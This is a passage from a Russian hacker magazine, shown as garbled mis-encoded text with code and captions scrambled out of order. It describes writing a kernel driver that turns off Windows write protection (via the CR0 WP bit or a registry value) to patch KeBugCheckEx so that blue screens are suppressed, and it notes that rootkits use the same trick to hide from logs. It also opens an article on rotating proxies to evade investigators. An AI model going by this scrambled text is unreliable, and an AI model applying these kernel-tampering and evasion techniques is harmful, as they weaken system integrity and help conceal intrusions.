òîðíî â òîé æå ñàìîé ôóíêöèè. Ó íàñ íè÷åãî íå ïîëó÷èëîñü?! Íå òîðîïèìñÿ ñ âûâîäàìè! Âñå èäåò ïî ïëàíó! Èãíîðèðîâàíèå êðèòè÷åñêèõ îøèáîê âûçûâàåò öåëûé êàñêàä âòîðè÷íûõ èñêëþ÷åíèé, ÷òî â äàííîì ñëó÷àå è ïðîèñõîäèò. Ïîâòîðÿåì íàøó êîìàíäó "r eip = 8042C1E9" (äëÿ ýòîãî äîñòàòî÷íî íàæàòü ñòðåëêó ââåðõ/<ENTER>) è ñèñòåìà âîçâðàùàåòñÿ â íîðìàëüíûé ðåæèì! Òðåòèé ðàç îòëàä÷èê óæå íå âñïëûâàåò. Ìûøü íåìíîãî òîðìîçèò, îäíàêî ãîíÿòü åå ïî êîâðèêó âïîëíå ðåàëüíî. Ïðèñòóïàåì ê ñîçäàíèþ äðàéâåðà, êîòîðûé áóäåò âñå ýòî äåëàòü çà íàñ. Äëÿ íà÷àëà íàì ïîíàäîáèòñÿ ñêåëåò. Âûãëÿäèò îí òàê:

r eip = eip + 9

ñêåëåò ïñåâäîäðàéâåðà, íå óïðàâëÿþùèé íèêàêèìè óñòðîéñòâàìè, íî ïîçâîëÿþùèé íàì âûïîëíÿòü êîä íà óðîâíå ÿäðà

a eip add esp,0c jmp BE67C005h

; àäðåñ êîìàíäû RET 8, â òâîåì ñëó÷àå áóäåò äðóãèì

<ENTER>

.386

; èñïîëüçîâàòü êîìàíäû .386 ÖÏ

r fl=I

.model flat, stdcall

; ïëîñêàÿ ìîäåëü ïàìÿòè, stdcall-âûçîâû ïî óìîë÷àíèþ

.code

; ñåêöèÿ êîäà

DriverEntry proc

; òî÷êà âõîäà â äðàéâåð

x

ÀÂÒÎÌÀÒÈÇÈÐÓÅÌ ÍÀØÓ ÐÀÁÎÒÓ Ñïîñîá ðó÷íîãî âîññòàíîâëåíèÿ, òîëüêî ÷òî îïèñàííûé âûøå, õîðîøî ñî÷åòàåòñÿ ñ äóõîì ñèñòåìíûõ ïðîãðàììèñòîâ, ïîñòîÿííî ïàñóùèõ SoftICE è óìåþùèõ ôåõòîâàòü ðåãèñòðàìè, êàê ðàïèðîé. À âîò ïðîñòûì þçåðàì òàêîé ïîäõîä ñìåðòè ïîäîáåí. Íî ïî÷åìó áû íàì íå íàïèñàòü äëÿ íèõ óòèëèòó, çàöèêëèâàþùóþ ñáîéíûé ïîòîê èëè çàìûêàþùóþ KeBugCheckEx? Íàïèñàòü òàêóþ øòóêó íåñëîæíî (è ìû äåéñòâèòåëüíî íàïèøåì åå), íî ýòî âñå ðàâíî, ÷òî ïîäëîæèòü ïîëåíî ïîä àâàðèéíûé êëàïàí. Åñëè ñèñòåìà ïîéäåò âðàçíîñ, åå óæå íè÷åãî íå îñòàíîâèò. Ìîæåò ïîñòðàäàòü äàæå ôàéëîâàÿ ñèñòåìà (ïóñòü ýòî áóäåò õîòü NTFS). Êîíå÷íî, âåðîÿòíîñòü òàêîé òðàãåäèè êðàéíå ìàëà, íî îíà âñå-òàêè âîçìîæíà — èìåé ýòî â âèäó. Òåì íå ìåíåå, ðèñêíóòü âñå-òàêè ñòîèò, îñîáåííî â òåõ ñëó÷àÿõ, êîãäà òû óâåðåí, ÷òî ýòî ìîæíî ñäåëàòü. Âîò, íàïðèìåð, âîçíèê ó ìåíÿ êàê-òî êîíôëèêò ìåæäó êðèâî íàïèñàííûì äðàéâåðîì DSL-ìîäåìà è äðàéâåðîì âèäåîêàðòû, à èç-çà ýòîãî ïðè ïðîñìîòðå âèäåî èíîãäà âûñêàêèâàë BSOD. Ïîñêîëüêó íîðìàëüíûõ äðîâ íàéòè íå óäàëîñü, ÿ âðåìåííî îãðàíè÷èëñÿ òåì, ÷òî çàêîðîòèë KeBugCheckEx ïåðåìû÷êîé, èçãîòîâëåííîé èç êîìàíäû JMP è, òû íå ïîâåðèøü, ýòî ïðèæèëîñü! Ïðîâåäåì ñëåäóþùèé ýêñïåðèìåíò. Íàæìåì <Ctrl-D> äëÿ âûçîâà SoftICE, óñòàíîâèì òî÷êó îñòàíîâà íà KeBugCheckEx è çàïóñòèì íàø äðàéâåð-óáèéöó. Ïðè÷åì òî÷êà îñòàíîâà îáÿçàòåëüíî äîëæíà áûòü àïïàðàòíîé ("bpm KeBugCheckEx X"), à íå ïðîãðàììíîé (bpõ KeBugCheckEx), èíà÷å íè÷åãî íå ïîëó÷èòñÿ. Íà ýòîò ðàç âìåñòî ñîîáùåíèÿ îá îøèáêå ñòðàíè÷íîãî äîñòóïà, SoftICE âñïëûâàåò ïî ñðàáàòûâàíèþ òî÷êè îñòàíîâà, âûñâå÷èâàÿ êóðñîðîì ïåðâóþ êîìàíäó ôóíêöèè KeBugCheckEx, êîòîðàÿ â íàøåì ñëó÷àå ðàñïîëàãàåòñÿ ïî àäðåñó 8042BF14h. Ïðîêðó÷èâàÿ îêíî äèçàññåìáëåðà âíèç, íàõîäèì ïåðâóþ èíñòðóêöèþ "RET 14h" (â íàøåì ñëó÷àå îíà ðàñïîëàãàåòñÿ ïî àäðåñó: 8042C1E9h). Ýòî è åñòü êîìàíäà âûõîäà èç ôóíêöèè, íà êîòîðóþ íóæíî ñäåëàòü jmp. Äëÿ áûñòðîãî ïîèñêà ìîæíî ïîïðîñèòü SoftICE ñäåëàòü search ("s eip l -1 C2,14,00"). Ãîâîðèì îòëàä÷èêó "r eip = 8042C1E9" (ó òåáÿ àäðåñ, ñêîðåå âñåãî, áóäåò äðóãèì) è äàâèì íà <Ctrl-D> äëÿ âûõîäà. Îòëàä÷èê âñïëûâàåò ïîâ-

äçåíñêèé ñàä ãîëóáûõ ýêðàíîâ ñìåðòè

116

àâèàëàéíåð îò Microsoft

; êîä «äðàéâåðà» ; … … … ; âîçâðàùàåì îøèáêó êîíôèãóðàöèè mov eax, 0C0000182h; STATUS_DEVICE_CONFIGURATION_ERROR ret

; âûõîäèì

DriverEntry endp end DriverEntry

Íà ñàìîì äåëå ýòî íå ñîâñåì äðàéâåð. Îí íå ïðèíèìàåò íèêàêèõ IRPïàêåòîâ, íå îáñëóæèâàåò íèêàêèõ óñòðîéñòâ è, âîîáùå, íå äåëàåò íè÷åãî, à òîëüêî çàãðóæàåòñÿ è âûãðóæàåòñÿ. Íî äëÿ íàøåé çàòåè ýòîãî áóäåò âïîëíå äîñòàòî÷íî! Âåñü êîä ñîñðåäîòî÷åí âíóòðè ïðîöåäóðû DriverEntry (ñâîåîáðàçíîì àíàëîãå ôóíêöèè main ÿçûêà Ñè), êîòîðàÿ âûïîëíÿåòñÿ ïðè ïîïûòêå çàãðóçêè äðàéâåðà, èíèöèàëèçèðóÿ âñå, ÷òî íåîáõîäèìî. Îòñþäà ìîæíî äîòÿíóòüñÿ äî ôóíêöèè KeBugCheckEx è ìîäèôèöèðîâàòü åå ïî ñâîåìó óñìîòðåíèþ. Íåñìîòðÿ íà òî, ÷òî ïðîöåäóðà DriverEntry âûïîëíÿåòñÿ íà óðîâíå ÿäðà ñ ìàêñèìàëüíûìè ïðèâèëåãèÿìè, ïîïûòêà ïðàâêè ìàøèííîãî êîäà ïðèâîäèò ê íàðóøåíèþ äîñòóïà. Ýòî ñðàáàòûâàåò çàùèòà îò íåïðåäíàìåðåííîãî õàêà ÿäðà íåêîððåêòíûì äðàéâåðîì. Êàê åå îòêëþ÷èòü? Ïóòü ïåðâûé — ÷åðåç ðååñòð. Ñîçäàåì â ðàçäåëå HKLM\SYSTEM\ CurrentControlSet\Control\SessionManager\Memory Management çíà÷åíèå òèïà REG_DWORD ñ èìåíåì EnforceWriteProtection è çíà÷åíèåì 0 (ýòî ìîæíî äåëàòü è ñ ïðèêëàäíîãî óðîâíÿ). Âñå! Çàïèñü â ÿäðî îòêðûòà! Êñòàòè ãîâîðÿ, SoftICE èìåííî òàê è ðàáîòàåò. Ïóòü âòîðîé — ðåïàìèíã ñòðàíèö. Îòîáðàæàåì ôèçè÷åñêèé àäðåñ ñòðàíèöû, â êîòîðîé ëåæèò KeBugCheckEx, íà âèðòóàëüíîå àäðåñíîå

îáû÷íî ïîñëå BSOD íàñòóïàåò ñìåðòü…

XÀÊÅÐ 01 /85/ 06


ïðîñòðàíñòâî ñâîåãî ïðîöåññà ïîñðåäñòâîì âûçîâà ôóíêöèè NtMapViewOfSection, íàçíà÷àÿ âñå íåîáõîäèìûå íàì ïðàâà. Ðåïàìèíã îñóùåñòâëÿåòñÿ èñêëþ÷èòåëüíî íà óðîâíå ÿäðà, íî ê îòîáðàæåííîé ñòðàíèöå ìîæíî îáðàùàòüñÿ äàæå èç ïðèêëàäíîãî óðîâíÿ. Êðàñîòà! Ïî ýòîé ñõåìå ðàáîòàþò ìíîãèå áðàíäìàóýðû è äðóãèå ïðîãðàììû, íóæäàþùèåñÿ â ïåðåõâàòå ÿäåðíûõ ôóíêöèé, íàïðèìåð, rootkit'û. Ïîäðîáíîñòè çäåñü: http://www.stanford.edu/~stinson/misc/curr_res/nt_hooking.txt. Ïóòü òðåòèé — ñáðîñ ôëàãà WP â ðåãèñòðå cr0. Ýòî äîñòàòî÷íî ãðÿçíûé òðþê ñ öåëîé ñâèòîé ïðîòèâîïîêàçàíèé è ðåêëàìàöèé, îäíàêî äëÿ íàøèõ öåëåé îí âïîëíå ïîäõîäèò. Èñïîëüçóåì åãî êàê ñàìûé ïðîñòîé è áûñòðûé âàðèàíò, óìåùàþùèéñÿ âñåãî â 3-õ (!) ìàøèííûõ êîìàíäàõ: êîä, îòêëþ÷àþùèé çàùèòó ÿäðà îò çàïèñè mov

eax, cr0

and

eax, 0FFFEFFFFh ; ñáðàñûâàåì áèò WP, çàïðåùàþùèé çàïèñü

; ãðóçèì óïðàâëÿþùèé ðåãèñòð cr0 â ðåãèñòð eax

mov

cr0, eax

; îáíîâëÿåì óïðàâëÿþùèé ðåãèñòð cr0

Ñîîòâåòñòâåííî, ÷òîáû âêëþ÷èòü çàùèòó, ýòîò ñàìûé áèò WP íóæíî óñòàíîâèòü, ÷òî è äåëàþò ñëåäóþùèå ìàøèííûå êîìàíäû:

êîä, âêëþ÷àþùèé çàùèòó ÿäðà mov

eax, cr0

or

eax, 10000h ; ñáðàñûâàåì áèò WP, çàïðåùàþùèé çàïèñü

; ãðóçèì óïðàâëÿþùèé ðåãèñòð cr0 â ðåãèñòð eax

mov

cr0, eax

; îáíîâëÿåì óïðàâëÿþùèé ðåãèñòð cr0

Ïîëèòè÷åñêè êîððåêòíàÿ ïðîãðàììà äîëæíà íå ïðîñòî îòêëþ÷àòü/âêëþ÷àòü çàùèòó îò çàïèñè, à çàïîìèíàòü òåêóùåå ñîñòîÿíèå áèòà WP ïåðåä åãî èçìåíåíèåì, à çàòåì âîññòàíàâëèâàòü åãî îáðàòíî, èíà÷å ìîæíî íåïðîèçâîëüíî âêëþ÷èòü çàùèòó â ñàìûé íåïîäõîäÿùèé ìîìåíò, ñåðüåçíî íàâðåäèâ âèðóñó èëè rootkit'ó. Çàêîðîòèòü ôóíêöèþ KeBugCheckEx ìîæíî ðàçíûìè ïóòÿìè. Ñàìîå ïðàâèëüíîå (è íàäåæíîå!) — îïðåäåëèòü åå àäðåñ ïóòåì ðàçáîðà òàáëèöû èìïîðòà, íî ýòî ñëèøêîì äîëãî, ìóòîðíî, íóäíî è óòîìèòåëüíî. Ãîðàçäî ïðîùå ïîäñòàâèòü ãîòîâûå àäðåñà, æåñòêî ïðîïèñàâ èõ â ñâîåé ïðîãðàììå. Ìèíóñ ýòîãî ðåøåíèÿ â òîì, ÷òî íà äðóãèõ êîìïüþòåðàõ îíà ðàáîòàòü íå áóäåò. Ñòîèò óñòàíîâèòü (èëè óäàëèòü) êàêîé-òî ServicePack, ïåðåéòè íà äðóãóþ âåðñèþ ñèñòåìû, êàê âñå àäðåñà òóò æå èçìåíÿòñÿ, è ïðîèçîéäåò ñïëîøíîé çàâèñ. Òåì íå ìåíåå, èìåÿ èñõîä-

ÈÑÊËÞ×ÅÍÈÅ È ÍÀÊÀÇÀÍÈÅ

Âñåãäà ëè ïîìîãàåò øóíòèðîâàíèå KeBugCheckEx? Íàñêîëüêî ýòî áåçîïàñíî? Ýòî î÷åíü îïàñíî, òåì áîëåå äàëåêî íå âñåãäà ïîìîãàåò. Âîò, íàïðèìåð, ðàññìîòðèì ñëåäóþùèé ïðèìåð êîäà, ïîçàèìñòâîâàííûé èç ÿäðà: ôðàãìåíò êîäà, ïðè êîòîðîì øóíòèðîâàíèå KeBugCheckEx çàêàí÷èâàåòñÿ î÷åíü ïå÷àëüíî 00565201 call ExAllocatePoolWithTag 00565206 cmp eax, ebx 00565208 mov ds:dword_56BA84, eax 0056520D jnz short loc_56521C 0056520F push ebx 00565210 push ebx 00565211 push 6 00565213 push 5 00565215 push 67h 00565217 call KeBugCheckEx 0056521C loc_56521C: 0056521C lea eax, [ebp+var_C] 0056521F push ebx 00565220 push eax

; âûäåëåíèå ïàìÿòè èç ëóæè ; ïðîâåðêà óñïåøíîñòè âûäåëåíèÿ ïàìÿòè ; -> íàì äàëè ïàìÿòü! æèâåì, ìóæèêè! ; ; ; ñ ïàìÿòüþ âûøåë îáëîì ; îòïðàâëÿåìñÿ íà íåáåñà ; ; ; CODE XREF: sub_5651C1+4Cj ; ïðîäîëæàåì íîðìàëüíîå âûïîëíåíèå

Ñèñòåìà âûäåëÿåò ïàìÿòü èç îáùåãî ïóëà, è åñëè ñ ïàìÿòüþ íå îáëîì, òî ïðîèñõîäèò íîðìàëüíîå ïðîäîëæåíèå, â ïðîòèâíîì ñëó÷àå âñïûõèâàåò ãîëóáîé ýêðàí. Äîïóñòèì, ìû çàêîðîòèëè KeBugCheckEx, ÷òî òîãäà? Íàñ îáëîìàëè íà ïàìÿòü, à ìû ïðîäîëæàåì íîðìàëüíîå âûïîëíåíèå, êàê íè â ÷åì íå áûâàëî, îáðàùàÿñü ïî óêàçàòåëþ, êîòîðûé óêàçûâàåò â íèêóäà. Âîçíèêàåò öåëûé êàñêàä âòîðè÷íûõ èñêëþ÷åíèé, à âñå ñòðóêòóðû äàííûõ ïðåâðàùàþòñÿ â òðóõó, è ñèñòåìà ðóøèòñÿ îêîí÷àòåëüíî. Âîò òàê.

×ÅÃÎ ÍÅ ÓÌÅÅÒ NTFS Äëÿ ìèíèìàëèçàöèè ïîñëåäñòâèé êðàõà ñèñòåìû, NT ïîääåðæèâàåò ñïåöèàëüíûå call-back'è. Âñÿêèé äðàéâåð ìîæåò âûçûâàòü ôóíêöèþ KeRegisterBugCheckCallback è çàðåãèñòðèðîâàòü ñïåöèàëüíûé îáðàáîò÷èê, êîòîðûé áóäåò ïîëó÷àòü óïðàâëåíèå â ìîìåíò âîçíèêíîâåíèÿ ãîëóáîãî ýêðàíà. Ýòî ïîçâîëÿåò êîððåêòíî îñòàíàâëèâàòü îáîðóäîâàíèå, íàïðèìåð, ïàðêîâàòü ãîëîâêè æåñòêîãî äèñêà. Øóòêà! À âîò äðàéâåðó ôàéëîâîé ñèñòåìû ñáðîñèòü ñâîè áóôåðà íè÷óòü íå ïîìåøàëî áû, òåì áîëåå ÷òî îí ìîæåò ïðîâåðèòü èõ öåëîñòíîñòü ïî CRC èëè ëþáûì äðóãèì ïóòåì. Õîäÿò óñòîé÷èâûå ñëóõè, ÷òî NTFS èìåííî òàê è ïîñòóïàåò. Êàê áû íå òàê! Ìûùúõ äèçàññåìáëèðîâàë NTFS.SYS è íå íàøåë òàì íèêàêèõ ïðèçíàêîâ âûçîâà KeRegisterBugCheckCallback!  ìîìåíò àâàðèè áóôåðà NTFS îñòàþòñÿ íå ñáðîøåííûìè, è îíà âûæèâàåò òîëüêî áëàãîäàðÿ ïîääåðæêå òðàíçàêöèé, ïðè êîòîðûõ ãàðàíòèðóåòñÿ àòîìàðíîñòü âñåõ îïåðàöèé, òî åñòü îïåðàöèÿ ëèáî âûïîëíÿåòñÿ, ëèáî — íåò. Îáíîâëåíèå ôàéëîâîé çàïèñè íå ìîæåò ïðîèçîéòè íàïîëîâèíó, è ïîòîìó, â îòëè÷èå îò FAT, ïîòåðÿííûå êëàñòåðû íà íåé íå îáðàçóþòñÿ. Íó, ïðàêòè÷åñêè íå îáðàçóþòñÿ.

XÀÊÅÐ 01 /85/ 06

117


ÊÎÄÈÍÃ ///// ISSUE ASSEMBLER

ÍÅ Â ØÓÒÊÓ, ÍÅ ÂÑÅÐÜÅÇ

Ðèñêíó ïðåäïîëîæèòü, ÷òî íà àíãëèéñêèé «ÿäðåíà âîøü» ïåðåâîäèòñÿ, êàê kernel bug. Íåò, âû òîëüêî ïðåäñòàâüòå ñåáå, ÷òî åùå íàøè ïðàäåäû, èñïûòûâàÿ íåäîñòàòîê ñëîâàðíîãî çàïàñà äëÿ èçëèÿíèÿ ïåðåïîëíÿâøèõ èõ ýìîöèé, ïóñêàëèñü â íåòðèâèàëüíîå îáñóæäåíèå íåäîñòàòêîâ ïðîãðàììíûõ êîìïëåêñîâ! Ýòî ëè íå íàãëÿäíîå ñâèäåòåëüñòâî ãåíåòè÷åñêîé ïðåäðàñïîëîæåííîñòè ðóññêîãî íàðîäà ê âûñîêèì òåõíîëîãèÿì?! (ñ) Leonid Loiterstein íûå òåêñòû äðàéâåðà ïîä ðóêîé, åãî âñåãäà ìîæíî èñïðàâèòü è ïåðåêîìïèëèðîâàòü. Òàê ÷òî äëÿ äîìàøíåãî èñïîëüçîâàíèÿ òàêîå ðåøåíèå âïîëíå äîïóñòèìî. Ãëàâíàÿ òîíêîñòü â òîì, ÷òî ìû íå äîëæíû òðîãàòü ïåðâûé áàéò ôóíêöèè KeBugChekEx, ïîñêîëüêó åãî óæå «ïîòðîãàë» SoftICE. Òàê æå ïîñòóïàþò è äðóãèå õàêåðñêèå ïðîãðàììû (íàïðèìåð, API-øïèîíû), ïîìåùàÿ ñþäà êîìàíäó INT 03 (îïêîä CCh), ïðåäâàðèòåëüíî ñîõðàíèâ ïðåæíåå ñîäåðæèìîå ãäå-òî â äðóãîì ìåñòå. ÎÊ, ïðîïóñòèì ïåðâóþ êîìàíäó (PUSH EBP) è íà÷íåì âíåäðåíèå ñî âòîðîé. ×òîáû ñáàëàíñèðîâàòü ñòåê â ïðîòèâîâåñ PUSH EBP, ãîâîðèì POP EAX, à çàòåì ëèáî jmp íà RET 14h, ëèáî ñàì RET 14h. Ïîñëåäíèé âàðèàíò êîðî÷å è ýëåãàíòíåå. Ðåàëèçóåòñÿ îí òàê: êîä, çàêîðà÷èâàþùèé KeBugCheckEx mov dword ptr DS:[8042BF14h+1], 14C258h

Çäåñü: 8042BF14h — àäðåñ íà÷àëà ôóíêöèè KeBugCheckEx (íà âñåõ ìàøèíàõ ðàçíûé), 1 — äëèíà èíñòðóêöèè PUSH EBP, à 14C258h — ìàøèííûé êîä, ïðåäñòàâëÿþùèé ñîáîé ïîñëåäîâàòåëüíîñòü äâóõ êîìàíä: POP EAX (58h)/RET 14h (C2h 14h 00h). Îáúåäèíèâ âñå êîìïîíåíòû âîåäèíî, ìû ïîëó÷àåì ñëåäóþùèé ïàïåëàö: ñðåäñòâî ïðîòèâ BSOD, ïåðåä óïîòðåáëåíèåì âñòðÿõíóòü

Íî, âíèìàíèå! Ïîä VM Ware òàêîé òðþê íå ñðàáàòûâàåò, ïîñêîëüêó îíà íå ïîëíîñòüþ ýìóëèðóåò ðåãèñòð cr0 è òàêèõ øóòîê â óïîð íå ïîíèìàåò, âûçûâàÿ çàâèñ ãîñòåâîé îñè.  ýòîì ñëó÷àå ìîæíî çàêîììåíòèðîâàòü âñå ñòðîêè, îòíîñÿùèåñÿ ê ðåãèñòðó cr0 è îòêëþ÷èòü çàùèòó ÷åðåç ðååñòð, ñîçäàâ ñîîòâåòñòâóþùèé êëþ÷ ðåäàêòîðîì. Êñòàòè ãîâîðÿ, åñëè íà öåëåâîé ìàøèíå óñòàíîâëåí SoftICE, òî òàêîé êëþ÷ óæå ñîçäàí, è íè÷åãî äåëàòü íå íàäî. Çàãðóçèì äðàéâåð-óáèéöó, ÷òîáû ïðîâåðèòü ñïðàâèòñÿ ëè ñ íèì íàøå ñðåäñòâî ïðîòèâ BSOD èëè íåò. SoftICE (åñëè îí óñòàíîâëåí) íåñêîëüêî ðàç âñïëûâàåò. Âîò çàíóäà! Ãîíè åãî ïðî÷ü, íàæèìàÿ «x» èëè <Ctrl-D>. Âñå ðàâíî ãîëóáîé ýêðàí óæå íå ïîÿâëÿåòñÿ! Ñèñòåìà æóòêî òîðìîçèò, íî ðàáîòàåò. Ïëîõî òî, ÷òî òåïåðü NT íèêàê íå ìîæåò ñèãíàëèçèðîâàòü, ÷òî ïðîèçîøåë ñèñòåìíûé ñáîé è ÷òî íóæíî ïîáûñòðåå ñìàòûâàòü ëàñòû, ñîâåðøàÿ shutdown. Êñòàòè, ïî÷åìó ýòî íå ìîæåò ñèãíàëèçèðîâàòü?! Ñàìîå ïðîñòîå — äîáàâèòü â íàøó çàïëàòêó íà KeBugCheckEx íåñêîëüêî àññåìáëåðíûõ ñòðîê, êîòîðûå «áèáèêíóò» ñïèêåðîì èëè ñûãðàþò ñåìü-ñîðîê íà äèíàìèêå.  ïðèíöèïå, ìîæíî äàæå ðàçäåëèòü BugCheck-êîäû íà êàòåãîðèè, êàæäîé èç êîòîðîé áóäåò ñîîòâåòñòâîâàòü ñâîå ÷èñëî ãóäêîâ. Çà ïðèìåðàìè äàëåêî õîäèòü íå íàäî. Èõ ìîæíî âûäðàòü èç ëþáîãî DOS-âèðóñà. Òåõíèêà ïðîãðàììèðîâàíèÿ ñïèêåðà íà óðîâíå ÿäðà òà æå ñàìàÿ, è îíà íè÷óòü íå èçìåíèëàñü. Äà ìíîãî ÷òî ìîæíî ñäåëàòü! Ãëàâíîå — ôàíòàçèþ èìåòü!

.386 .model flat, stdcall .code DriverEntry proc Mov eax, cr0

; ãðóçèì óïðàâëÿþùèé ðåãèñòð cr0 â ðåãèñòð eax

mov ebx, eax

; ñîõðàíÿåì áèò WP â ðåãèñòðå ebx

and eax, 0FFFEFFFFh

; ñáðàñûâàåì áèò WP, çàïðåùàþùèé çàïèñü

mov cr0, eax

; îáíîâëÿåì óïðàâëÿþùèé ðåãèñòð cr0

mov dword ptr DS:[8042BF14h+1], 14C258h 14C258 ; «çàêîðà÷èâàåì» KeBugCheckEx mov cr0, ebx

; âîññòàíàâëèâàåì áèò WP

mov eax, 0C0000182h

; STATUS_DEVICE_CONFIGURATION_ERROR

ÆÈÇÍÜ ÏÎÑËÅ BSOD Ìû ïåðåæèëè ñàìóþ ñòðàøíóþ êàòàñòðîôó — BSOD, ïîñëå êîòîðîé íàì âñå ïî ïëå÷ó! Êîíå÷íî, íåðàçóìíî ïðàêòèêîâàòü òàêîé ïîäõîä íà ñåðâåðå, íî äëÿ ðàáî÷èõ ñòàíöèé îí âïîëíå ïðèåìëåì. Ïðîâåðåíî íà ìûùúõ'èíîé øêóðå! Êñòàòè ãîâîðÿ, íåêîòîðûå âèðóñû, ÷åðâè è rootkit'û èñïîëüçóþò ñõîæóþ òåõíèêó äëÿ ìàñêèðîâêè ñâîåãî ïðèñóòñòâèÿ â ñèñòåìå. Íåêîððåêòíî íàïèñàííûé âèðóñ ìîæåò âûçâàòü ñèíèé ýêðàí, è â ñèñòåìíîì æóðíàëå ïîÿâèòñÿ ñîîòâåòñòâóþùàÿ çàïèñü, ïîìîãàþùàÿ àäìèíèñòðàòîðó ðàçîáðàòüñÿ ñ ïðîáëåìîé. Åñëè æå ïåðåìêíóòü KeBugCheckEx, òî êîìïüþòåð áóäåò ïðîñòî áåñïðè÷èííî òîðìîçèòü (èëè âèñíóòü), íî â æóðíàëå íè÷åãî íå ïîÿâèòñÿ! BINARY YOUR’S z

ret DriverEntry endp end DriverEntry

Âîò òàêîé ìàëåíüêèé äðàéâåð, à ñêîëüêî äàííûõ îí ìîæåò ñïàñòè! Îñòàåòñÿ òîëüêî îòêîìïèëèðîâàòü åãî. êëþ÷è àññåìáëèðîâàíèÿ è ëèíêîâêè (èñïîëüçóåòñÿ ïàêåò MASM èç NT DDK)

ïðåäñìåðòíîå ñîîáùåíèå VM Ware, êîòîðàÿ îíà ÷àñòî âûäàåò, êîãäà íàä íåé ïðîâîäÿò ðàçíûå ýêñïåðèìåíòû.

ml /nologo /c /coff nobsod.asm link /driver /base:0x10000 /align:32 /out:nobsod.sys /subsystem:native nobsod.obj

Åñëè âñå áûëî ñäåëàíî ïðàâèëüíî, òî íà äèñêå îáðàçóåòñÿ ôàéë nobsod.sys, êîòîðûé ìû çàãðóçèì ñ ïîìîùüþ äèíàìè÷åñêîãî çàãðóç÷èêà w2k_load. Çàãðóç÷èê, êîíå÷íî, çàðóãàåòñÿ ìàòîì, ÷òî, ìîë, ERROR è äðàéâåð âîîáùå íå ãðóçÿòñÿ, íî òàê è äîëæíî áûòü. Âñå íîðìàëüíî! Ìû æå âîçâðàòèëè êîä STATUS_DEVICE_CONFIGURATION_ERROR!

118

ëó÷øàÿ ðåêëàìà òîâàðó — ñèíèé ýêðàí

ãîëóáîé ýêðàí íà ïëàòíîì èíòåðíåò-òåëåôîíå

XÀÊÅÐ 01 /85/ 06


ÊÎÄÈÍÃ DELPHI

TEXT F0GG0T / F0GG0T@GMAIL.RU /

ÏÀÍÅËÜ ÄËß ÏÐÎÊÑÅÉ ÑÎÇÄÀÍÈÅ ÕÀÊÅÐÑÊÎÃÎ ÒÓÐÁÀÐÀ ÄËß INTERNET EXPLORER

ÂÅÐÎßÒÍÎ, ÊÀÆÄÛÉ ÍÅ ÐÀÇ ÓÁÅÆÄÀËÑß ÍÀ ÑÂÎÅÌ ÎÏÛÒÅ, ×ÒÎ ÁÅÇÎÏÀÑÍÎÑÒÜ ÒÐÅÁÓÅÒ ÁÎËÜØÈÕ ÇÀÒÐÀÒ ÂÐÅÌÅÍÈ È ÝÍÅÐÃÈÈ ÊÀÊ Â CÅÒÈ, ÒÀÊ È Â ÐÈÀËËÀÉÔÅ. ÏÎÄÓÌÀÒÜ ÒÎËÜÊÎ, ÂÅÄÜ ÍÓÆÍÎ ÏÐÈ ÊÀÆÄÎÌ ÊÎÍÍÅÊÒÅ ÂÂÎÄÈÒÜ ÏÀÐÎËÜ Â ÀÑÜÊÓ, ÎÒÊÐÛÂÀÒÜ ÒÐÈÄÖÀÒÜ ÇÀÌÊΠÍÀ ÆÅËÅÇÍÎÉ ÄÂÅÐÈ, ×ÅÊÀÒÜ È ÓÑÒÀÍÀÂËÈÂÀÒÜ ÍÎÂÛÅ ÏÐÎÊÑÈ Â ÁÐÀÓÇÅÐ. ÃÅÌÎÐÐÎÉ, ÎÄÍÈÌ ÑËÎÂÎÌ. Ñ ÏÎÌÎÙÜÞ ÝËÅÌÅÍÒÀÐÍÛÕ ÍÀÂÛÊΠÊÎÄÈÍÃÀ ß ÏÎÑÒÀÐÀÞÑÜ ÍÅÑÊÎËÜÊÎ ÈÑÏÐÀÂÈÒÜ ÝÒÎ ÒßÆÅËÎÅ ÏÎËÎÆÅÍÈÅ, ÑÄÅËÀ ÆÈÇÍÜ ×ÓÒÎ×ÊÓ ÊÎÌÔÎÐÒÍÅÅ

Ãëàâíîå äëÿ õàêåðà — áåçîïàñíîñòü (íó è êîíå÷íî, ïðè÷èíà, ïî êîòîðîé ýòà áåçîïàñíîñòü ïîòðåáîâàëàñü — ïðèì.ðåä). Åñëè òâîé IP îáíàðóæàò â òåõ ëîãàõ, ãäå åãî áûòü íå äîëæíî, òî òåáÿ íàéäóò è, ïîâåðü ìíå, ìàëî íå ïîêàæåòñÿ. Òàê ÷òî êàæäîìó õàêåðó íåîáõîäèìû åùå è ñåòåâûå êîíòðàöåïòèâû, êîòîðûõ ðàñïëîäèëîñü ñåãîäíÿ âåëèêîå ìíîæåñòâî. Òóò è VPN, è ñîêñû, è ïðîêñè. Ïóñòü ïðîêñè íå òàê íàäåæíû, íî ñ èõ ïîèñêîì îáû÷íî ïðîáëåì íå âîçíèêàåò, è ëþáîé áðàóçåð ñòàðàåòñÿ èõ ïîääåðæèâàòü. Íî åñëè òû áóäåøü þçàòü îäèí ïðîêñèê, ïîêà ó òåáÿ íå ïîÿâÿòñÿ âíóêè, òî ôñáýøíèêè âñå ðàâíî äîãîâîðÿòñÿ ñ âëàäåëüöåì ñåðâåðà è ñíîâà óñòðîþò òåáå íåïðèÿòíîñòè. Ïîýòîìó íàäî ðåãóëÿðíî ìåíÿòü ïðîêñèêè (êàðäåðàì ýòî ïðèõîäèòñÿ äåëàòü êàæäûå 15 ìèíóò, äëÿ êàæäîãî àêêàóíòà ó íèõ ïî ïðîêñèêó — ïðèì.ðåä). Íî äëÿ ýòîãî ïðèõîäèòñÿ êàæäûé ðàç ëàçèòü â íàñòðîéêè áðàóçåðà, íàæèìàòü íà ñîòíþ êíîïîê, ÷òî áåçóìíî íåóäîáíî. À òû ïðåäñòàâü, ÷òî ñìåíà ïðîêñåé ìîæåò ëåãêî ïðîèçâîäèòüñÿ íàæàòèåì íà îäíó êíîïêó. È ýòà êíîïêà ïîìåùåíà ðÿäîì ñ àäðåñíîé ñòðîêîé.  èòîãå òû ñâîáîäåí è â ïîëíîé ðåëàêñàöèè. Êàê æå ýòî îñóùåñòâèòü? Èäåàëüíûì ñïîñîáîì ÿâëÿåòñÿ ñîçäàíèå ñâîåãî ñîáñòâåííîãî òóëáàðà. Ýòî òàêàÿ õèòðàÿ ïàíåëüêè, êîòîðàÿ áóäåò âñåãäà ïîä ðóêîé â òâîåì ëþáèìîì IE.

íàø çàìå÷àòåëüíûé òóëáàð äëÿ áûñòðîé ñìåíû proxy-ñåðâåðîâ

